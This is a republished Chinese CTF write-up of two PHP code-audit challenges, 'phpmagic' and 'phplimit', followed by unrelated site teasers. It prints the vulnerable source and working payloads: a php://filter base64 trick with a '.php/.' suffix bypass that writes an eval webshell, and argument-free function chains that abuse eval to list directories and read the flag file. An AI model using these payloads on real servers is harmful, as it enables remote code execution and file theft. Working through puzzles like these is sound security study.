p神代码审计知识星球二周年wp[2]-低调大师

p神代码审计知识星球二周年wp[2]

2018-12-04 638

参考文献：https://m3lon.github.io/2018/05/29/RCTF-r-cursive-wp/
http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/
递归匹配：http://www.laruence.com/2011/09/30/2179.html

easy - phpmagic

源码

<?php
if(isset($_GET['read-source'])) {
    exit(show_source(__FILE__));
}
define('DATA_DIR', dirname(__FILE__) . '/data/' . md5($_SERVER['REMOTE_ADDR']));
if(!is_dir(DATA_DIR)) {
    mkdir(DATA_DIR, 0755, true);
}
chdir(DATA_DIR);
$domain = isset($_POST['domain']) ? $_POST['domain'] : '';
$log_name = isset($_POST['log']) ? $_POST['log'] : date('-Y-m-d');
?>
<!doctype html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE=" crossorigin="anonymous">
    <title>Domain Detail</title>
    <style>
    pre {
        width: 100%;
        background-color: #f6f8fa;
        border-radius: 3px;
        font-size: 85%;
        line-height: 1.45;
        overflow: auto;
        padding: 16px;
        border: 1px solid #ced4da;
    }
    </style>
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col">
            <form method="post">
                <div class="input-group mt-3">
                    <div class="input-group-prepend">
                        <span class="input-group-text" id="basic-addon1">dig -t A -q</span>
                    </div>
                    <input type="text" name="domain" class="form-control" placeholder="Your domain">
                    <div class="input-group-append">
                        <button class="btn btn-outline-secondary" type="submit">执行</button>
                    </div>
                </div>
            </form>
        </div>
    </div>
    <div class="row">
        <div class="col">
            <pre class="mt-3"><?php if(!empty($_POST) && $domain):
                $command = sprintf("dig -t A -q %s", escapeshellarg($domain));
                $output = shell_exec($command);
                $output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);
                $log_name = $_SERVER['SERVER_NAME'] . $log_name;
                if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
                    file_put_contents($log_name, $output);
                }
                echo $output;
            endif; ?></pre>
        </div>
    </div>
</div>
</body>
</html>

解题思路
能控制文件名和文件内容，但是文件内容被htmlspecialchars函数过滤了一次，尖括号没了。PHP的一个特点：只要是传filename的地方，基本都可以传协议流。而file_put_contents的第一个参数就是传filename的地方
一个简单的栗子

利用php伪协议流解码base64写入webshell
其他问题

后缀名将能解析php文件的全禁止了
$log_name之前会加上$_SERVER['SERVER_NAME']，不完全可控文件名
文件内容也不完全可控

解决方法

一个可以在windows和linux上都行得通的方法：

filename=1.php/.&content=<?php phpinfo();?>

在操作系统中，都是禁止使用/作为文件名的，但是后面加一个.就可以成功的写入1.php了。pathinfo就取不到后缀名，可以正常写入.php之中。且无论是在windows上还是linux上，每次都只可以创建新文件，不能覆盖老文件

$_SERVER['SERVER_NAME']取的是HTTP headers中的Host的值。md5($_SERVER['REMOTE_ADDR'])是自己本机外网ip的md5值

最终payload

domain=PD9waHAgZXZhbCgkX1BPU1RbMTJdKTs/Pg&log=://filter/write=convert.base64-decode/resource=6.php/.

在p神的环境上可以直接成功。但是在本机上测试的时候，写入的文件一直是乱码，后来经大佬提醒才知道还需填充字符串。(左边是p神的环境，右边是自己的)

在自己本机上的payload

domain=aaaPD9waHAgZXZhbCgkX1BPU1RbMTJdKTs/Pg&log=://filter/write=convert.base64-decode/resource=8.php/.

easy - phplimit

源码

<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
} else {
    show_source(__FILE__);
}

解题思路

\W：任意个非单词字符。匹配非字母、数字、下划线。等价于 `[^A-Za-z0-9_]`
?: 匹配前面的子表达式零次或一次，或指明一个非贪婪限定符。要匹配 ? 字符，请使用 \?
\((?R)?\)：(?R)*表示, 正则式本身, 可以认为是:`(正则本身(正则本身).....)`。

那么此题最终的正则匹配就是可以递归执行函数，不可以带参数。
php函数

getcwd ()：取得当前工作目录
dirname()：给出一个包含有指向一个文件的全路径的字符串，本函数返回去掉文件名后的目录名。
chdir()：改变当前的目录。
scandir(directory)：返回一个 array，包含有 `directory` 中的文件和目录
readdir ()：返回目录中下一个文件的文件名。文件名以在文件系统中的排序返回
array_reverse() ：接受数组 array 作为输入并返回一个单元为相反顺序的新数组
next()：它返回的是下一个数组单元的值并将数组指针向前移动了一位。
get_defined_vars ()：返回一个包含所有已定义变量列表的多维数组，这些变量包括环境变量、服务器变量和用户定义的变量。 
reset()：将 array 的内部指针倒回到第一个单元并返回第一个数组单元的值。

不带参数的一些函数组合

?code=print(phpinfo());
?code=print(readdir(opendir(getcwd())));                  #列目录
?code=print(readfile(readdir(opendir(getcwd()))));         #读文件
?code=print(dirname(dirname(getcwd())));      #print出/var
?code=eval(implode(getallheaders()));    #apache模块的函数
?code=eval(implode(get_defined_vars()));

最终payload

?code=readfile(implode(array_reverse(scandir(dirname(chdir(dirname(getcwd()))))))); #查看当前文件夹
?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));

或者

?1=readfile("../flag_phpbyp4ss");//&code=eval(implode(reset(get_defined_vars())))

微信关注我们

原文链接：https://yq.aliyun.com/articles/676229

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

.NET redis cluster

原文: .NET redis cluster 一、下载Windows版本Redis 下载链接：https://github.com/MSOpenTech/redis/releases（根据系统选择对应版本）二、修改默认的配置文件如上图两个配置文件，redis.windows.conf（应用程序配置文件）;redis.windows-service.conf（Redis windows 服务使用的配置文件）。主要配置： 1. bind #IP 2.port #端口 3.loglevel #日志级别 4.logfile #日志保存位置 5.dir #数据保存地址 6.cluster-enabled yes #启用集群 7.cluster-config-file #nodes.conf （redis记录文件，自动生成） 8.cluster-node-timeout #失效时间（毫秒）注意：以上配置节点行头不要留有空格，否则会报错。三、准备集群配置文件将修改好的配置文件复制如下图四、准备集群环境安装rubay（由于 Redis 的集群使用 ruby脚本编写，所以系统需...

2018-12-03

646

今天要学习的队列,也是一种线性结构,他包括两类顺序队列:即使用一组地址连续的内存单元依次保存队列中的数据链式队列:即使用链表形式保存队列中各元素的值队列用图来表示就是这样的从图中可以看出,队列允许在两端进行操作,一段进行添加操作,称为队尾,以便进行删除操作称为队头,他遵循了先进先出FIFO(first in first out)的规则,那这是什么意思呢?拿生活中的例子就是排队,先来的拍前面,前面的先接受服务从上面也可以看出来,队列的基本操作只有两种入队:就是将元素添加到队尾出队:就是将队头的元素移出那么我们来看的一下队列的入队出队流程注意:上图的添加顺序是按照数字的大小顺序添加的,而非从右到左添加的:即添加顺序为0>1>2>3>4>5>6,而不是类似压入栈的顺序:6>5>4>3>2>1>0 如上就反映出来一个问题:随着出队和入队的操作,tail指针一直在往后移,也就导致了整个队列在"假变小",因为入队只能在一端进行,所以tail就一直往后移,导致了前面的出队后的位置不能再次利用,那么我们应该怎么去...

2018-12-04

628

资源下载

更多资源

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题，腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构，目前腾讯云软件源站支持公网访问和内网访问。

Spring

Spring框架（Spring Framework）是由Rod Johnson于2002年提出的开源Java企业级应用框架，旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念，提供核心容器、应用上下文、数据访问集成等模块，支持整合Hibernate、Struts等第三方框架，其适用范围不仅限于服务器端开发，绝大多数Java应用均可从中受益。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。

WebStorm

WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的HTML5编辑器”、“最智能的JavaScript IDE”等。与IntelliJ IDEA同源，继承了IntelliJ IDEA强大的JS部分的功能。